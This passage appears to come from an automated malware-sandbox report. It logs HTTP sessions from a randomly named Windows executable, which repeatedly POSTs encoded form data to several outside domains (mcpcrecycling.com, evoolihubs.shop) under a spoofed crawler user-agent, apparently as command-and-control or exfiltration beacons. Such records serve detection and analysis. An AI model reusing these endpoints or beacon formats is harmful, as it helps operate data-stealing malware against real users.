                                                          Data Ascii: 108c<html><head><title>Domain Suspension</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href='https://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'><link rel="stylesheet" href="data/styles/style.css"><link rel="stylesheet" href="data/styles/ls.css"></head><body class="table-wrapper"><script src="https://www.google.com/recaptcha/api.js?hl=en"></script><div class="table-cell"><div id="container" style="position:relative;"><div id="country-select"> <form action=""> <select id="country-options" name="country-options"> <option selected="selected" title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=en" value="en">English</option>
                                                          Jul 13, 2024 00:04:20.682598114 CEST | 1236 | IN | Data Raw: 20 20 3c 6f 70 74 69 6f 6e 20 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 77 6c 73 71 2f 3f 44 30 50 74 73 30 34 3d 39 47 39 4a 61 51 72 65 75 31 71 37 70 56 57 64 6e 74 53 71 65 6d 66 72 5a 74 34 59 4d 45
                                                          Data Ascii: <option title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=fr" value="fr">Franais</opti
                                                          Jul 13, 2024 00:04:20.682636023 CEST | 1236 | IN | Data Raw: 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 77 6c 73 71 2f 3f 44 30 50 74 73 30 34 3d 39 47 39 4a 61 51 72 65 75 31 71 37 70 56 57 64 6e
                                                          Data Ascii: /option> <option title="//www.noghteyab.com/wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx&lang=es" value="es">Es
                                                          Jul 13, 2024 00:04:20.682670116 CEST | 883 | IN | Data Raw: 67 20 64 65 6c 65 74 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6f 6e 20 75 70 64 61 74 69 6e 67 20 79 6f 75 72 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63
                                                          Data Ascii: g deleted. For more information on updating your contact information please contact your domain service provider.</p></div><div id="captcha"><p>Enter the text displayed in the image below, then click the resend button to ha


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          25 | 192.168.2.6 | 49748 | 3.33.130.190 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:25.730942011 CEST | 734 | OUT | POST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 4e 70 49 4e 61 61 44 50 38 43 54 42 44 74 50 56 7a 31 4f 37 6f 42 4d 30 62 6c 6e 56 69 6b 50 53 31 47 43 6c 56 64 54 41 67 48 51 76 52 67 63 73 4b 46 31 6f 63 46 33 6d 6f 38 38 71 4f 6b 45 66 30 41 37 6d 79 4e 6e 66 4a 70 52 46 5a 56 44 38 44 68 4f 49 64 47 6b 33 61 34 54 71 7a 37 6a 48 38 4c 6f 42 6b 4c 35 33 35 76 6b 54 73 74 77 64 37 55 53 58 65 46 73 30 4d 61 57 77 47 47 75 49 4c 50 33 70 51 74 36 57 6e 76 51 65 38 4d 31 2b 67 76 78 39 42 6f 37 72 42 6a 63 49 70 5a 41 6f 5a 73 69 55 58 54 35 65 36 76 61 66 49 4c 79 2f 49 75 56 32 76 79 34 4a 6d 34 6b 7a 68 6d 6c 31
                                                          Data Ascii: D0Pts04=FAG48FZzNEPUNpINaaDP8CTBDtPVz1O7oBM0blnVikPS1GClVdTAgHQvRgcsKF1ocF3mo88qOkEf0A7myNnfJpRFZVD8DhOIdGk3a4Tqz7jH8LoBkL535vkTstwd7USXeFs0MaWwGGuILP3pQt6WnvQe8M1+gvx9Bo7rBjcIpZAoZsiUXT5e6vafILy/IuV2vy4Jm4kzhml1


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.6 | 49749 | 3.33.130.190 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:28.268542051 CEST | 758 | OUT | POST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 37 53 30 6a 6d 6c 55 59 76 41 6a 48 51 76 57 51 64 6b 45 6c 31 6e 63 46 7a 51 6f 39 77 71 4f 6b 51 66 30 46 2f 6d 79 2b 66 63 47 5a 52 4c 4e 6c 44 45 4e 42 4f 49 64 47 6b 33 61 34 48 41 7a 37 37 48 38 37 59 42 6e 75 56 32 77 50 6b 51 6b 4e 77 64 2f 55 53 62 65 46 73 4b 4d 59 79 61 47 44 69 49 4c 4b 62 70 54 2f 65 58 74 76 51 59 68 38 30 69 77 2f 30 77 50 36 69 4d 46 46 63 52 2b 4a 6b 57 63 61 6a 4f 4c 67 35 39 6f 2f 36 64 49 4a 71 4e 49 4f 56 63 74 79 41 4a 30 76 6f 55 75 53 41 57 77 76 2b 34 67 4b 30 6f 32 66 78 52 34 32 52 75 4a 52 49 65 49 51 3d 3d
                                                          Data Ascii: D0Pts04=FAG48FZzNEPUPJ4NY5bP1CTCfdPVh1PwoBA0bnL7i27S0jmlUYvAjHQvWQdkEl1ncFzQo9wqOkQf0F/my+fcGZRLNlDENBOIdGk3a4HAz77H87YBnuV2wPkQkNwd/USbeFsKMYyaGDiILKbpT/eXtvQYh80iw/0wP6iMFFcR+JkWcajOLg59o/6dIJqNIOVctyAJ0voUuSAWwv+4gK0o2fxR42RuJRIeIQ==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.6 | 49750 | 3.33.130.190 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:30.797411919 CEST | 1771 | OUT | POST /22y6/ HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.mcpcrecycling.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.mcpcrecycling.com/22y6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 41 47 34 38 46 5a 7a 4e 45 50 55 50 4a 34 4e 59 35 62 50 31 43 54 43 66 64 50 56 68 31 50 77 6f 42 41 30 62 6e 4c 37 69 32 44 53 30 56 71 6c 56 2f 37 41 69 48 51 76 56 51 64 6e 45 6c 31 36 63 42 6e 4d 6f 39 73 36 4f 6d 6f 66 30 6a 44 6d 30 50 66 63 64 70 52 4c 53 31 44 2f 44 68 50 49 64 47 30 7a 61 34 58 41 7a 37 37 48 38 34 41 42 7a 4c 35 32 79 50 6b 54 73 74 77 52 37 55 54 4d 65 42 4a 78 4d 59 6d 67 47 51 71 49 4c 75 37 70 44 63 36 58 77 66 51 61 69 38 30 71 77 2b 4a 77 50 36 75 71 46 46 41 76 2b 4b 34 57 63 38 71 56 54 68 5a 6e 72 2b 2b 59 58 61 75 59 47 65 4d 72 76 51 63 4c 30 75 78 6e 6e 54 42 31 6f 70 79 35 79 63 35 50 78 70 38 2f 32 68 67 51 49 78 56 79 54 4a 30 33 78 4c 4f 63 46 4f 55 4f 74 46 35 70 6f 4c 6b 69 39 41 79 58 52 2f 47 59 48 37 7a 4b 76 6e 56 39 47 45 67 41 76 52 4e 75 32 52 79 68 30 56 4a 2b 4f 6d 42 71 32 6b 66 30 53 31 70 75 52 67 4a 66 48 54 45 47 2b 4c 4f 68 39 35 79 6c 68 53 30 59 37 6e 37 76 2b 51 7a 72 33 41 4a 48 79 44 73 52 54 79 6f 39 73 4a [TRUNCATED]
                                                          Data Ascii: D0Pts04= [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.6 | 49751 | 3.33.130.190 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:33.327718019 CEST | 471 | OUT | GET /22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.mcpcrecycling.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:33.785254955 CEST | 418 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:04:33 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 49 43 75 59 2f 77 70 6e 53 46 4c 59 57 71 5a 66 65 34 4f 73 2f 67 48 63 47 34 33 76 6b 6b 79 74 34 42 77 51 51 69 48 32 7a 56 33 66 39 46 2f 58 52 4e 79 61 67 58 51 67 61 6b 42 6a 4e 30 51 63 4e 41 2b 33 67 61 38 37 41 45 52 45 7a 78 4c 74 39 61 4c 4d 4f 71 4d 6b 58 46 62 6d 4a 45 71 53 50 6c 5a 71 47 61 61 30 68 70 72 62 38 38 59 78 36 4d 73 6d 2b 66 34 76 69 4e 78 32 6f 47 4c 33 65 31 30 72 62 2f 30 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.6 | 49752 | 188.114.96.3 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:38.881293058 CEST | 728 | OUT | POST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 57 2f 6c 4c 38 53 37 55 5a 76 79 59 2b 75 6d 51 6f 51 5a 37 47 62 52 35 56 70 69 6a 48 4f 53 76 41 48 65 51 63 33 76 62 6b 34 2b 4e 50 73 75 6a 44 51 50 71 4b 61 72 31 51 41 30 6d 7a 57 36 46 57 53 6b 5a 43 58 30 47 50 2f 52 41 4d 63 52 72 77 4b 53 2f 37 75 41 72 76 59 61 43 4b 4b 59 4e 35 71 34 36 4d 69 70 55 47 37 72 7a 37 2f 78 33 72 4f 61 52 6a 41 77 50 55 6b 2f 36 42 68 39 44 54 59 4d 6f 67 4c 33 61 34 30 78 59 57 42 47 77 33 42 62 4c 59 77 44 63 6d 6a 68 72 78 35 4a 69 4a 74 7a 4b 63 62 56 56 7a 6a 50 63 52 7a 6b 54 65 58 2b 54 65 62 6b 6f 55 51 6d 38 56 71 70 4f
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCW/lL8S7UZvyY+umQoQZ7GbR5VpijHOSvAHeQc3vbk4+NPsujDQPqKar1QA0mzW6FWSkZCX0GP/RAMcRrwKS/7uArvYaCKKYN5q46MipUG7rz7/x3rOaRjAwPUk/6Bh9DTYMogL3a40xYWBGw3BbLYwDcmjhrx5JiJtzKcbVVzjPcRzkTeX+TebkoUQm8VqpO
                                                          Jul 13, 2024 00:04:39.340420008 CEST | 855 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:39 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FY%2FS1Y0M%2BLjGruJJqCoVXnS5HX4CqdNr6YIZdjbYJuT1qLPXzzZ%2F6pIxE8XUW%2FJIfQycoVZQD0ztt4bvx30PhFNqOPe9fIr8SH6mZa%2FEk%2FKcaCFMCwIh8B0ZERlh49fCk4St74rm"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454898e506a4e-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          30 | 192.168.2.6 | 49753 | 188.114.96.3 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:41.421397924 CEST | 752 | OUT | POST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 6d 76 41 6d 75 51 64 31 58 62 6c 34 2b 4e 46 4d 75 6d 63 41 50 74 4b 61 33 44 51 42 49 6d 7a 53 61 46 57 57 67 5a 42 6d 30 42 4a 76 52 4f 45 38 52 74 74 61 53 2f 37 75 41 72 76 63 4b 6f 4b 4b 41 4e 36 65 38 36 4b 44 70 62 4c 62 72 77 38 2f 78 33 39 2b 61 56 6a 41 77 74 55 68 62 41 42 6a 56 44 54 59 63 6f 67 65 58 5a 7a 30 78 6b 4c 78 48 56 6d 78 43 33 61 44 71 2b 68 42 67 4c 75 2b 4a 64 4d 62 79 51 41 6f 56 32 68 7a 76 65 52 78 38 68 65 33 2b 35 63 62 63 6f 47 48 71 62 61 65 4d 74 55 6b 64 2b 36 45 43 50 46 2f 34 34 34 70 43 43 48 66 66 2f 76 41 3d 3d
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsmvAmuQd1Xbl4+NFMumcAPtKa3DQBImzSaFWWgZBm0BJvROE8RttaS/7uArvcKoKKAN6e86KDpbLbrw8/x39+aVjAwtUhbABjVDTYcogeXZz0xkLxHVmxC3aDq+hBgLu+JdMbyQAoV2hzveRx8he3+5cbcoGHqbaeMtUkd+6ECPF/444pCCHff/vA==
                                                          Jul 13, 2024 00:04:41.899492979 CEST | 853 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:41 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:41 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELBF37mziYz1534%2FVe7%2BxDmEwew2D9C762qVV%2FY9Y%2F5ANic6OHw7qfSA043fLENrSOdb7waRH7XIoYasSlCVYYQ3XoM%2FjnL3kXzDF5QdhkFLMcGwOrfALw02IUIU0pPgltd%2FEKA2"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454997a4919c3-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          31 | 192.168.2.6 | 49754 | 188.114.96.3 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:43.955631018 CEST | 1765 | OUT | POST /fwdd/ HTTP/1.1
                                                          Host: www.evoolihubs.shop
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.evoolihubs.shop
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.evoolihubs.shop/fwdd/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 65 76 44 51 61 51 64 55 58 62 6d 34 2b 4e 65 4d 75 6e 63 41 4f 78 4b 61 76 66 51 42 45 59 7a 55 57 46 58 31 34 5a 41 53 6f 42 41 76 52 4f 47 38 52 6f 77 4b 54 33 37 75 77 76 76 59 75 6f 4b 4b 41 4e 36 66 4d 36 4e 53 70 62 4a 62 72 7a 37 2f 78 37 72 4f 61 35 6a 44 41 58 55 68 66 51 42 53 31 44 54 34 73 6f 68 74 2f 5a 77 55 78 6d 49 78 48 33 6d 78 2b 53 61 43 47 59 68 41 46 6b 75 35 4a 64 50 4d 48 74 46 4b 5a 4f 69 53 2f 64 45 79 38 72 65 48 2b 38 59 61 34 6e 57 51 65 45 5a 2b 4d 48 52 7a 64 54 30 53 62 45 45 74 55 31 37 35 2f 72 4f 64 4b 73 74 63 76 78 51 32 31 5a 2f 41 73 4e 6c 61 67 56 76 32 70 55 49 32 77 31 77 6c 4a 4a 6a 55 33 69 78 48 4f 68 47 30 58 51 38 34 73 47 41 67 2b 36 64 64 73 6f 4f 66 65 78 74 69 47 49 75 45 4b 69 78 5a 65 69 34 37 45 79 68 5a 4b 79 46 30 52 73 42 34 49 41 45 78 2b 72 54 61 38 31 34 73 50 53 71 49 67 54 2f 76 6e 69 41 74 [TRUNCATED]
                                                          Data Ascii: D0Pts04=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsevDQaQdUXbm4+NeMuncAOxKavfQBEYzUWFX14ZASoBAvROG8RowKT37uwvvYuoKKAN6fM6NSpbJbrz7/x7rOa5jDAXUhfQBS1DT4soht/ZwUxmIxH3mx+SaCGYhAFku5JdPMHtFKZOiS/dEy8reH+8Ya4nWQeEZ+MHRzdT0SbEEtU175/rOdKstcvxQ21Z/AsNlagVv2pUI2w1wlJJjU3ixHOhG0XQ84sGAg+6ddsoOfextiGIuEKixZei47EyhZKyF0RsB4IAEx+rTa814sPSqIgT/vniAtYQMh18v1extfsGxCZANKYthmlaRXOrPk6fLAiLPJSxl17GkLS/WdHFw8C0hR+zYEoAnaH8l6RcdHxiqFvEVg/6wdIWlbtB52d+Lp1eqJKu1VhzSgbhkBP+0iSJRwda1uSczyiOuIMs12UoawmJzfRVJhOdpUTEivjigxN1DUBAJ/6iW+gmY5w0VY+BOEO0OrYaUm4VtBH04Q/S7/okAaCSxY1WFqdOEUVQurdayLrswjXhIi2ziEIHzIvOfcSM0tPa+l0FcqCZrBApxRcoeBeRxpRbkT1jIEdQbflUvU3Qd9sAWYW2v6nRhczkdPfzisCuPD7C8N6XSTrhOigRYVowVGEBixySe5XaVDc6X9PZ5pPHBqgkBWC+sgO7I9B6LYyE/YcB37v7hYzRs+cUbEOXwR+xgO6favovQRXBut6gxm5JpcTIxIYTKBh2x7tLOkxhFsCHcz/+XIZNaQw9I/4aTCQ2SCz5csH7Y+b2SWHZLV6a3vIk/tklYIGDBSC7g/fs8hDqpCylHFfUulUT7o98rDJwC+ytGqE5OUSo7tjZ59A5EGuPQKGFlgdDd1Al10j+H5KLiCGHeenVV1ELC5HvSxMuJkgLz+Nn2ZJVgW+Hcilwf6A9wuwx5Yr3yQKMLT7Sw6k653MlOh2Jw4IOqH8g32dg9RT3Oz4E [TRUNCATED]
                                                          Jul 13, 2024 00:04:44.435503006 CEST | 859 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:04:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 167
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Fri, 12 Jul 2024 23:04:44 GMT
                                                          Location: https://www.evoolihubs.shop/fwdd/
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q0C1pHszJ%2B6dGK1amJiRMaISW%2FIfCa%2FpDDQDIPd6l7n%2F7ustvALSmXQNB%2BEXGV9%2BerFwhs%2BCnuTFd7pGwb1JvuqTIYOQY%2BSiF7ddWhY2KAD%2F74A3I7unXUWPusU23F7ffQetszN"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          Server: cloudflare
                                                          CF-RAY: 8a2454a95eec8c15-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
